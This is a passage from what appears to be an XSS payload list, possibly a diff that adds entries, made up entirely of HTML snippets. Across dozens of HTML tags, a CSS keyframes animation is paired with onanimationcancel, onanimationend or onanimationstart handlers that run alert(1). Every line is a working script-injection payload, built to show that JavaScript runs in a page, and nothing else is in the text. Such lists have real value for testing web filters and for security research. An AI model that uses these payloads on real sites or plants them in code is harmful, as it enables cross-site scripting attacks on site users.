onanimationcancel="alert(1)"></colgroup> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><command id=x style="position:absolute;" onanimationcancel="alert(1)"></command> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><content id=x style="position:absolute;" onanimationcancel="alert(1)"></content> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><data id=x style="position:absolute;" onanimationcancel="alert(1)"></data> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><datalist id=x style="position:absolute;" onanimationcancel="alert(1)"></datalist> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dd id=x style="position:absolute;" onanimationcancel="alert(1)"></dd> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><del id=x style="position:absolute;" onanimationcancel="alert(1)"></del> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><details id=x style="position:absolute;" onanimationcancel="alert(1)"></details> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dfn id=x style="position:absolute;" onanimationcancel="alert(1)"></dfn> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dialog id=x style="position:absolute;" onanimationcancel="alert(1)"></dialog> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dir id=x style="position:absolute;" onanimationcancel="alert(1)"></dir> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><div id=x style="position:absolute;" onanimationcancel="alert(1)"></div> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dl id=x style="position:absolute;" onanimationcancel="alert(1)"></dl> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dt id=x style="position:absolute;" onanimationcancel="alert(1)"></dt> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><element id=x style="position:absolute;" onanimationcancel="alert(1)"></element> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><em id=x style="position:absolute;" onanimationcancel="alert(1)"></em> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><embed id=x style="position:absolute;" onanimationcancel="alert(1)"></embed> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><fieldset id=x style="position:absolute;" onanimationcancel="alert(1)"></fieldset> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><figcaption id=x style="position:absolute;" onanimationcancel="alert(1)"></figcaption> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><figure id=x style="position:absolute;" onanimationcancel="alert(1)"></figure> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><font id=x style="position:absolute;" onanimationcancel="alert(1)"></font> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><footer id=x style="position:absolute;" onanimationcancel="alert(1)"></footer> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><form id=x style="position:absolute;" onanimationcancel="alert(1)"></form> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><frame id=x style="position:absolute;" onanimationcancel="alert(1)"></frame> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><frameset id=x style="position:absolute;" onanimationcancel="alert(1)"></frameset> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><h1 id=x style="position:absolute;" onanimationcancel="alert(1)"></h1> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><head id=x style="position:absolute;" onanimationcancel="alert(1)"></head> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><header id=x style="position:absolute;" onanimationcancel="alert(1)"></header> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><hgroup id=x style="position:absolute;" onanimationcancel="alert(1)"></hgroup> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><hr id=x style="position:absolute;" onanimationcancel="alert(1)"></hr> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><html id=x style="position:absolute;" onanimationcancel="alert(1)"></html> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><i id=x style="position:absolute;" onanimationcancel="alert(1)"></i> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><iframe id=x style="position:absolute;" onanimationcancel="alert(1)"></iframe> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><image id=x style="position:absolute;" onanimationcancel="alert(1)"></image> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><img id=x style="position:absolute;" onanimationcancel="alert(1)"></img> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><input id=x style="position:absolute;" onanimationcancel="alert(1)"></input> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><ins id=x style="position:absolute;" onanimationcancel="alert(1)"></ins> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><isindex id=x style="position:absolute;" onanimationcancel="alert(1)"></isindex> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><kbd id=x style="position:absolute;" onanimationcancel="alert(1)"></kbd> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><keygen id=x style="position:absolute;" onanimationcancel="alert(1)"></keygen> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><label id=x style="position:absolute;" onanimationcancel="alert(1)"></label> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><legend id=x style="position:absolute;" onanimationcancel="alert(1)"></legend> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><li id=x style="position:absolute;" onanimationcancel="alert(1)"></li> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><link id=x style="position:absolute;" onanimationcancel="alert(1)"></link> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><listing id=x style="position:absolute;" onanimationcancel="alert(1)"></listing> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><main id=x style="position:absolute;" onanimationcancel="alert(1)"></main> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><map id=x style="position:absolute;" onanimationcancel="alert(1)"></map> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><mark id=x style="position:absolute;" onanimationcancel="alert(1)"></mark> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><marquee id=x style="position:absolute;" onanimationcancel="alert(1)"></marquee> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><menu id=x style="position:absolute;" onanimationcancel="alert(1)"></menu> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><menuitem id=x style="position:absolute;" onanimationcancel="alert(1)"></menuitem> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><meta id=x style="position:absolute;" onanimationcancel="alert(1)"></meta> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><meter id=x style="position:absolute;" onanimationcancel="alert(1)"></meter> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><multicol id=x style="position:absolute;" onanimationcancel="alert(1)"></multicol> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><nav id=x style="position:absolute;" onanimationcancel="alert(1)"></nav> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><nextid id=x style="position:absolute;" onanimationcancel="alert(1)"></nextid> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><nobr id=x style="position:absolute;" onanimationcancel="alert(1)"></nobr> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><noembed id=x style="position:absolute;" onanimationcancel="alert(1)"></noembed> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><noframes id=x style="position:absolute;" onanimationcancel="alert(1)"></noframes> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><noscript id=x style="position:absolute;" onanimationcancel="alert(1)"></noscript> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><object id=x style="position:absolute;" onanimationcancel="alert(1)"></object> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><ol id=x style="position:absolute;" onanimationcancel="alert(1)"></ol> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><optgroup id=x style="position:absolute;" onanimationcancel="alert(1)"></optgroup> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><option id=x style="position:absolute;" onanimationcancel="alert(1)"></option> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><output id=x style="position:absolute;" onanimationcancel="alert(1)"></output> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><p id=x style="position:absolute;" onanimationcancel="alert(1)"></p> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><param id=x style="position:absolute;" onanimationcancel="alert(1)"></param> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><picture id=x style="position:absolute;" onanimationcancel="alert(1)"></picture> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><plaintext id=x style="position:absolute;" onanimationcancel="alert(1)"></plaintext> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><pre id=x style="position:absolute;" onanimationcancel="alert(1)"></pre> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><progress id=x style="position:absolute;" onanimationcancel="alert(1)"></progress> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><q id=x style="position:absolute;" onanimationcancel="alert(1)"></q> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><rb id=x style="position:absolute;" onanimationcancel="alert(1)"></rb> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><rp id=x style="position:absolute;" onanimationcancel="alert(1)"></rp> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><rt id=x style="position:absolute;" onanimationcancel="alert(1)"></rt> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><rtc id=x style="position:absolute;" onanimationcancel="alert(1)"></rtc> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><ruby id=x style="position:absolute;" onanimationcancel="alert(1)"></ruby> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><s id=x style="position:absolute;" onanimationcancel="alert(1)"></s> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><samp id=x style="position:absolute;" onanimationcancel="alert(1)"></samp> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><script id=x style="position:absolute;" onanimationcancel="alert(1)"></script> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><section id=x style="position:absolute;" onanimationcancel="alert(1)"></section> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><select id=x style="position:absolute;" onanimationcancel="alert(1)"></select> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><shadow id=x style="position:absolute;" onanimationcancel="alert(1)"></shadow> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><slot id=x style="position:absolute;" onanimationcancel="alert(1)"></slot> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><small id=x style="position:absolute;" onanimationcancel="alert(1)"></small> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><source id=x style="position:absolute;" onanimationcancel="alert(1)"></source> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><spacer id=x style="position:absolute;" onanimationcancel="alert(1)"></spacer> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><span id=x style="position:absolute;" onanimationcancel="alert(1)"></span> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><strike id=x style="position:absolute;" onanimationcancel="alert(1)"></strike> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><strong id=x style="position:absolute;" onanimationcancel="alert(1)"></strong> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><style id=x style="position:absolute;" onanimationcancel="alert(1)"></style> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><sub id=x style="position:absolute;" onanimationcancel="alert(1)"></sub> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><summary id=x style="position:absolute;" onanimationcancel="alert(1)"></summary> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><sup id=x style="position:absolute;" onanimationcancel="alert(1)"></sup> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><svg id=x style="position:absolute;" onanimationcancel="alert(1)"></svg> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><table id=x style="position:absolute;" onanimationcancel="alert(1)"></table> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><tbody id=x style="position:absolute;" onanimationcancel="alert(1)"></tbody> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><td id=x style="position:absolute;" onanimationcancel="alert(1)"></td> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><template id=x style="position:absolute;" onanimationcancel="alert(1)"></template> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><textarea id=x style="position:absolute;" onanimationcancel="alert(1)"></textarea> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><tfoot id=x style="position:absolute;" onanimationcancel="alert(1)"></tfoot> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><th id=x style="position:absolute;" onanimationcancel="alert(1)"></th> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><thead id=x style="position:absolute;" onanimationcancel="alert(1)"></thead> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><time id=x style="position:absolute;" onanimationcancel="alert(1)"></time> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><title id=x style="position:absolute;" onanimationcancel="alert(1)"></title> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><tr id=x style="position:absolute;" onanimationcancel="alert(1)"></tr> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><track id=x style="position:absolute;" onanimationcancel="alert(1)"></track> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><tt id=x style="position:absolute;" onanimationcancel="alert(1)"></tt> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><u id=x style="position:absolute;" onanimationcancel="alert(1)"></u> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><ul id=x style="position:absolute;" onanimationcancel="alert(1)"></ul> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><var id=x style="position:absolute;" onanimationcancel="alert(1)"></var> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><video id=x style="position:absolute;" onanimationcancel="alert(1)"></video> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><wbr id=x style="position:absolute;" onanimationcancel="alert(1)"></wbr> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><xmp id=x style="position:absolute;" onanimationcancel="alert(1)"></xmp> +<style>@keyframes x{}</style><a style="animation-name:x" onanimationend="alert(1)"></a> +<style>@keyframes x{}</style><a style="animation-name:x" onanimationstart="alert(1)"></a> +<style>@keyframes x{}</style><abbr style="animation-name:x" onanimationend="alert(1)"></abbr> +<style>@keyframes x{}</style><abbr style="animation-name:x" onanimationstart="alert(1)"></abbr> +<style>@keyframes x{}</style><acronym style="animation-name:x" onanimationend="alert(1)"></acronym> +<style>@keyframes x{}</style><acronym style="animation-name:x" onanimationstart="alert(1)"></acronym> +<style>@keyframes x{}</style><address style="animation-name:x" onanimationend="alert(1)"></address> +<style>@keyframes x{}</style><address style="animation-name:x" onanimationstart="alert(1)"></address> +<style>@keyframes x{}</style><applet style="animation-name:x" onanimationend="alert(1)"></applet> +<style>@keyframes x{}</style><applet style="animation-name:x" onanimationstart="alert(1)"></applet> +<style>@keyframes x{}</style><area style="animation-name:x" onanimationend="alert(1)"></area> +<style>@keyframes x{}</style><area style="animation-name:x" onanimationstart="alert(1)"></area> +<style>@keyframes x{}</style><article style="animation-name:x" onanimationend="alert(1)"></article> +<style>@keyframes x{}</style><article style="animation-name:x" onanimationstart="alert(1)"></article> +<style>@keyframes x{}</style><aside style="animation-name:x" onanimationend="alert(1)"></aside> +<style>@keyframes x{}</style><aside style="animation-name:x" onanimationstart="alert(1)"></aside> +<style>@keyframes x{}</style><audio style="animation-name:x" onanimationend="alert(1)"></audio> +<style>@keyframes x{}</style><audio style="animation-name:x" onanimationstart="alert(1)"></audio> +<style>@keyframes x{}</style><b style="animation-name:x" onanimationend="alert(1)"></b> +<style>@keyframes x{}</style><b style="animation-name:x" onanimationstart="alert(1)"></b> +<style>@keyframes x{}</style><base style="animation-name:x" onanimationend="alert(1)"></base> +<style>@keyframes x{}</style><base style="animation-name:x" onanimationstart="alert(1)"></base> +<style>@keyframes x{}</style><basefont style="animation-name:x" onanimationend="alert(1)"></basefont> +<style>@keyframes x{}</style><basefont style="animation-name:x" onanimationstart="alert(1)"></basefont> +<style>@keyframes x{}</style><bdi style="animation-name:x" onanimationend="alert(1)"></bdi> +<style>@keyframes x{}</style><bdi style="animation-name:x" onanimationstart="alert(1)"></bdi> +<style>@keyframes x{}</style><bdo style="animation-name:x" onanimationend="alert(1)"></bdo> +<style>@keyframes x{}</style><bdo style="animation-name:x" onanimationstart="alert(1)"></bdo> +<style>@keyframes x{}</style><bgsound style="animation-name:x" onanimationend="alert(1)"></bgsound> +<style>@keyframes x{}</style><bgsound style="animation-name:x" onanimationstart="alert(1)"></bgsound> +<style>@keyframes x{}</style><big style="animation-name:x" onanimationend="alert(1)"></big> +<style>@keyframes x{}</style><big style="animation-name:x" onanimationstart="alert(1)"></big> +<style>@keyframes x{}</style><blink style="animation-name:x" onanimationend="alert(1)"></blink> +<style>@keyframes x{}</style><blink style="animation-name:x" onanimationstart="alert(1)"></blink> +<style>@keyframes x{}</style><blockquote style="animation-name:x" onanimationend="alert(1)"></blockquote> +<style>@keyframes x{}</style><blockquote style="animation-name:x" onanimationstart="alert(1)"></blockquote> +<style>@keyframes x{}</style><body style="animation-name:x" onanimationend="alert(1)"></body> +<style>@keyframes x{}</style><body style="animation-name:x" onanimationstart="alert(1)"></body> +<style>@keyframes x{}</style><br style="animation-name:x" onanimationend="alert(1)"></br> +<style>@keyframes x{}</style><br style="animation-name:x" onanimationstart="alert(1)"></br> +<style>@keyframes x{}</style><button style="animation-name:x" onanimationend="alert(1)"></button> +<style>@keyframes x{}</style><button style="animation-name:x" onanimationstart="alert(1)"></button> +<style>@keyframes x{}</style><canvas style="animation-name:x" onanimationend="alert(1)"></canvas> +<style>@keyframes x{}</style><canvas style="animation-name:x" onanimationstart="alert(1)"></canvas> +<style>@keyframes x{}</style><caption style="animation-name:x" onanimationend="alert(1)"></caption> +<style>@keyframes x{}</style><caption style="animation-name:x" onanimationstart="alert(1)"></caption> +<style>@keyframes x{}</style><center style="animation-name:x" onanimationend="alert(1)"></center> +<style>@keyframes x{}</style><center style="animation-name:x" onanimationstart="alert(1)"></center> +<style>@keyframes x{}</style><cite style="animation-name:x" onanimationend="alert(1)"></cite> +<style>@keyframes x{}</style><cite style="animation-name:x" onanimationstart="alert(1)"></cite> +<style>@keyframes x{}</style><code style="animation-name:x" onanimationend="alert(1)"></code> +<style>@keyframes x{}</style><code style="animation-name:x" onanimationstart="alert(1)"></code> +<style>@keyframes x{}</style><col style="animation-name:x" onanimationend="alert(1)"></col> +<style>@keyframes x{}</style><col style="animation-name:x" onanimationstart="alert(1)"></col> +<style>@keyframes x{}</style><colgroup style="animation-name:x" onanimationend="alert(1)"></colgroup> +<style>@keyframes x{}</style><colgroup style="animation-name:x" onanimationstart="alert(1)"></colgroup> +<style>@keyframes x{}</style><command style="animation-name:x" onanimationend="alert(1)"></command> +<style>@keyframes x{}</style><command style="animation-name:x" onanimationstart="alert(1)"></command> +<style>@keyframes x{}</style><content style="animation-name:x" onanimationend="alert(1)"></content> +<style>@keyframes x{}</style><content style="animation-name:x" onanimationstart="alert(1)"></content> +<style>@keyframes x{}</style><data style="animation-name:x" onanimationend="alert(1)"></data> +<style>@keyframes x{}</style><data style="animation-name:x" onanimationstart="alert(1)"></data> +<style>@keyframes x{}</style><datalist style="animation-name:x" onanimationend="alert(1)"></datalist> +<style>@keyframes x{}</style><datalist style="animation-name:x" onanimationstart="alert(1)"></datalist> +<style>@keyframes x{}</style><dd style="animation-name:x" onanimationend="alert(1)"></dd> +<style>@keyframes x{}</style><dd style="animation-name:x" onanimationstart="alert(1)"></dd> +<style>@keyframes x{}</style><del style="animation-name:x" onanimationend="alert(1)"></del> +<style>@keyframes x{}</style><del style="animation-name:x" onanimationstart="alert(1)"></del> +<style>@keyframes x{}</style><details style="animation-name:x" onanimationend="alert(1)"></details> +<style>@keyframes x{}</style><details style="animation-name:x" onanimationstart="alert(1)"></details> +<style>@keyframes x{}</style><dfn style="animation-name:x" onanimationend="alert(1)"></dfn> +<style>@keyframes x{}</style><dfn style="animation-name:x" onanimationstart="alert(1)"></dfn> +<style>@keyframes x{}</style><dialog style="animation-name:x" onanimationend="alert(1)"></dialog> +<style>@keyframes x{}</style><dialog style="animation-name:x" onanimationstart="alert(1)"></dialog> +<style>@keyframes x{}</style><dir style="animation-name:x" onanimationend="alert(1)"></dir> +<style>@keyframes x{}</style><dir style="animation-name:x" onanimationstart="alert(1)"></dir> +<style>@keyframes x{}</style><div style="animation-name:x" onanimationend="alert(1)"></div> +<style>@keyframes x{}</style><div style="animation-name:x" onanimationstart="alert(1)"></div> +<style>@keyframes x{}</style><dl style="animation-name:x" onanimationend="alert(1)"></dl> +<style>@keyframes x{}</style><dl style="animation-name:x" onanimationstart="alert(1)"></dl> +<style>@keyframes x{}</style><dt style="animation-name:x" onanimationend="alert(1)"></dt> +<style>@keyframes x{}</style><dt style="animation-name:x" onanimationstart="alert(1)"></dt> +<style>@keyframes x{}</style><element style="animation-name:x" onanimationend="alert(1)"></element> +<style>@keyframes x{}</style><element style="animation-name:x" onanimationstart="alert(1)"></element> +<style>@keyframes x{}</style><em style="animation-name:x" onanimationend="alert(1)"></em> +<style>@keyframes x{}</style><em style="animation-name:x" onanimationstart="alert(1)"></em> +<style>@keyframes x{}</style><embed style="animation-name:x" onanimationend="alert(1)"></embed> +<style>@keyframes x{}</style><embed style="animation-name:x" onanimationstart="alert(1)"></embed> +<style>@keyframes x{}</style><fieldset style="animation-name:x" onanimationend="alert(1)"></fieldset> +<style>@keyframes x{}</style><fieldset style="animation-name:x" onanimationstart="alert(1)"></fieldset> +<style>@keyframes x{}</style><figcaption style="animation-name:x" onanimationend="alert(1)"></figcaption> +<style>@keyframes x{}</style><figcaption style="animation-name:x" onanimationstart="alert(1)"></figcaption> +<style>@keyframes x{}</style><figure style="animation-name:x" onanimationend="alert(1)"></figure> +<style>@keyframes x{}</style><figure style="animation-name:x" onanimationstart="alert(1)"></figure> +<style>@keyframes x{}</style><font style="animation-name:x" onanimationend="alert(1)"></font> +<style>@keyframes x{}</style><font style="animation-name:x" onanimationstart="alert(1)"></font> +<style>@keyframes x{}</style><footer style="animation-name:x" onanimationend="alert(1)"></footer> +<style>@keyframes x{}</style><footer style="animation-name:x" onanimationstart="alert(1)"></footer> +<style>@keyframes x{}</style><form style="animation-name:x" onanimationend="alert(1)"></form> +<style>@keyframes x{}</style><form style="animation-name:x" onanimationstart="alert(1)"></form> +<style>@keyframes x{}</style><frame style="animation-name:x" onanimationend="alert(1)"></frame> +<style>@keyframes x{}</style><frame style="animation-name:x" onanimationstart="alert(1)"></frame> +<style>@keyframes x{}</style><frameset style="animation-name:x" onanimationend="alert(1)"></frameset> +<style>@keyframes x{}</style><frameset style="animation-name:x" onanimationstart="alert(1)"></frameset> +<style>@keyframes x{}</style><h1 style="animation-name:x" onanimationend="alert(1)"></h1> +<style>@keyframes x{}</style><h1 style="animation-name:x" onanimationstart="alert(1)"></h1> +<style>@keyframes x{}</style><head style="animation-name:x" onanimationend="alert(1)"></head> +<style>@keyframes x{}</style><head style="animation-name:x" onanimationstart="alert(1)"></head> +<style>@keyframes x{}</style><header style="animation-name:x" onanimationend="alert(1)"></header> +<style>@keyframes x{}</style><header style="animation-name:x" onanimationstart="alert(1)"></header> +<style>@keyframes x{}</style><hgroup style="animation-name:x" onanimationend="alert(1)"></hgroup> +<style>@keyframes x{}</style><hgroup style="animation-name:x" onanimationstart="alert(1)"></hgroup> +<style>@keyframes x{}</style><hr style="animation-name:x" onanimationend="alert(1)"></hr> +<style>@keyframes x{}</style><hr style="animation-name:x" onanimationstart="alert(1)"></hr> +<style>@keyframes x{}</style><html style="animation-name:x" onanimationend="alert(1)"></html> +<style>@keyframes x{}</style><html style="animation-name:x" onanimationstart="alert(1)"></html> +<style>@keyframes x{}</style><i style="animation-name:x" onanimationend="alert(1)"></i> +<style>@keyframes x{}</style><i style="animation-name:x" onanimationstart="alert(1)"></i> +<style>@keyframes x{}</style><iframe style="animation-name:x" onanimationend="alert(1)"></iframe> +<style>@keyframes x{}</style><iframe style="animation-name:x" onanimationstart="alert(1)"></iframe> +<style>@keyframes x{}</style><image style="animation-name:x" onanimationend="alert(1)"></image> +<style>@keyframes x{}</style><image style="animation-name:x" 